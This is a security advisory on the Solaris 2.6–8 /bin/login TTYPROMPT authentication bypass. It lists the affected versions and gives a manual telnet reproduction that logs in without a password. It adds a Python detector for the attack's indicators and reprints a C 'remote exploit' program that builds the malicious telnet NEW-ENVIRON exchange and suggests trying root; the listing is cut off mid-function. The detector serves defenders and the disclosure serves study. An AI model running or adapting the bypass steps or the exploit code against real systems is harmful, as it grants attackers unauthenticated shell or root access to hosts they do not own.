Sun Solaris /bin/login Authentication Bypass Vulnerability
Published: 2002-10-02
Updated: 2002-10-05
Affected systems:
Sun login
- Sun Solaris 8.0 x86
- Sun Solaris 8.0 SPARC
- Sun Solaris 7.0 SPARC
- Sun Solaris 7.0
- Sun Solaris 2.6 SPARC
- Sun Solaris 2.6
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 5848
/bin/login on Solaris 2.6, 7 and 8 contains a vulnerability that allows authentication to be bypassed through the TTYPROMPT environment variable.
A remote attacker only needs to define the environment variable TTYPROMPT in telnet as a string of length 6, connect to the remote host, enter a user name followed by 64 " c" tokens and a carriage return, and is then logged in as that user with no password check. If the system allows root to log in remotely, root control is obtained directly.
<* Source: Jonathan Stuart (jons@ccpartnersltd.com)
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=103357889303304&w=2
*>
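As an added example (not part of the advisory and not the test program quoted later), a small Python detector that decodes the telnet NEW-ENVIRON subnegotiation a client sends and flags the two indicators of this bypass: a client-supplied TTYPROMPT together with a login line padded with 64 or more " c" tokens. The sample stream is constructed from the session shown in the advisory (TTYPROMPT=abcdef, user "bin"); the RFC 854 / RFC 1572 byte codes are standard, and the check assumes environment values contain no raw 0xff byte.

```python
# Telnet / NEW-ENVIRON codes from RFC 854 and RFC 1572.
IAC, SB, SE = 255, 250, 240
TELOPT_NEW_ENVIRON = 39
TELQUAL_IS, TELQUAL_INFO = 0, 2
ENV_VAR, ENV_VALUE, ENV_ESC, ENV_USERVAR = 0, 1, 2, 3


def parse_new_environ(data: bytes) -> dict:
    """Collect variables from every NEW-ENVIRON IS/INFO subnegotiation in a client stream."""
    env, pos = {}, 0
    while True:
        start = data.find(bytes([IAC, SB, TELOPT_NEW_ENVIRON]), pos)
        end = data.find(bytes([IAC, SE]), start + 3) if start >= 0 else -1
        if end < 0:
            return env
        body, pos = data[start + 3:end], end + 2
        if not body or body[0] not in (TELQUAL_IS, TELQUAL_INFO):
            continue
        name, value, cur, j = None, bytearray(), None, 1
        while j < len(body):
            b = body[j]
            if b in (ENV_VAR, ENV_USERVAR):      # start of a new variable name
                if name is not None:
                    env[name.decode("latin-1")] = value.decode("latin-1")
                name, value = bytearray(), bytearray()
                cur = name
            elif b == ENV_VALUE:                 # switch to collecting the value
                cur = value
            elif b == ENV_ESC:                   # next byte is a literal
                j += 1
                if j < len(body) and cur is not None:
                    cur.append(body[j])
            elif cur is not None:
                cur.append(b)
            j += 1
        if name is not None:
            env[name.decode("latin-1")] = value.decode("latin-1")


def ttyprompt_bypass_indicators(data: bytes) -> dict:
    """Flag a client-supplied TTYPROMPT plus a login line padded with 64 or more ' c' tokens."""
    ttyprompt = parse_new_environ(data).get("TTYPROMPT")
    padded = data.count(b" c") >= 64
    return {"ttyprompt": ttyprompt, "padded_login": padded,
            "suspicious": ttyprompt is not None and padded}


def build_sample() -> bytes:
    """Constructed client stream matching the advisory's session (not a real capture)."""
    sub = (bytes([IAC, SB, TELOPT_NEW_ENVIRON, TELQUAL_IS, ENV_VAR]) + b"TTYPROMPT"
           + bytes([ENV_VALUE]) + b"abcdef" + bytes([IAC, SE]))
    return sub + b"bin" + b" c" * 64 + b"\n"
```

Either indicator alone is worth alerting on: a legitimate telnet client has no reason to export TTYPROMPT, and the padded login line is visible in plain text on the wire.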
Test method:
--------------------------------------------------------------------------------
Jonathan Stuart (jons@ccpartnersltd.com) provided the following test method:
coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
SunOS 5.8
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami
bin
lion (lion@cnhonker.net) provided the following test program:
/******************************************************************
Solaris 2.6, 7, and 8 /bin/login TTYPROMPT remote exploit.
Tested for:
SunOS 5.5, 5.5.1, 5.6, 5.7, 5.8 Sparc
SunOS 5.7, 5.8 x86
Code by lion
lion@cnhonker.net
Welcome to HUC website http://www.cnhonker.com
******************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <netdb.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/telnet.h>

#define BUFLEN 1024

/* the six-byte TTYPROMPT value sent to the server */
char shellcode[] = "\x97\x97\x97\x97\x97\x97";

void usage(char *p)
{
    printf("Usage: %s [-u user] [-p port] <-h host>\n\n", p);
    printf(" -u: login username (default: bin), try \"root\"\n");
    printf(" -p: port to use (default: 23)\n\n");
    printf("\n");
    exit(0);
}

void msg(char *msg)
{
    perror(msg);
    exit(errno);
}

u_int32_t get_ip(char *host)
{
    struct hostent *hp;

    if (!(hp = gethostbyname(host))) {
        fprintf(stderr, "cannot resolve %s\n", host);
        return (0);
    }
    return (*(u_int32_t *)hp->h_addr_list[0]);
}

int get_socket(char *target, int port)
{
    int sock;
    u_int32_t ip;
    struct sockaddr_in sin;

    if (!(ip = get_ip(target)))
        return (0);
    bzero(&sin, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = htons(port);
    sin.sin_addr.s_addr = ip;
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        msg("socket");
    if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0)
        msg("connect");
    return (sock);
}

/* three-byte telnet option negotiation: IAC WONT/WILL/DO <option> */
void send_wont(int sock, int option)
{
    char buf[3], *ptr = buf;

    *ptr++ = IAC;
    *ptr++ = WONT;
    *ptr++ = (unsigned char)option;
    if (write(sock, buf, 3) < 0)
        msg("write");
    return;
}

void send_will(int sock, int option)
{
    char buf[3], *ptr = buf;

    *ptr++ = IAC;
    *ptr++ = WILL;
    *ptr++ = (unsigned char)option;
    if (write(sock, buf, 3) < 0)
        msg("write");
    return;
}

void send_do(int sock, int option)
{
    char buf[3], *ptr = buf;

    *ptr++ = IAC;
    *ptr++ = DO;
    *ptr++ = (unsigned char)option;
    if (write(sock, buf, 3) < 0)
        msg("write");
    return;
}

/* NEW-ENVIRON subnegotiation: IAC SB NEW-ENVIRON IS ... */
void send_env(int sock, char *name, char *value)
{
    char buf[BUFLEN], *ptr = buf;

    *ptr++ = IAC;
    *ptr++ = SB;
    *ptr++ = TELOPT_NEW_ENVIRON;
    *ptr++ = TELQUAL_IS;
    /* the listing is cut off at this point in the advisory */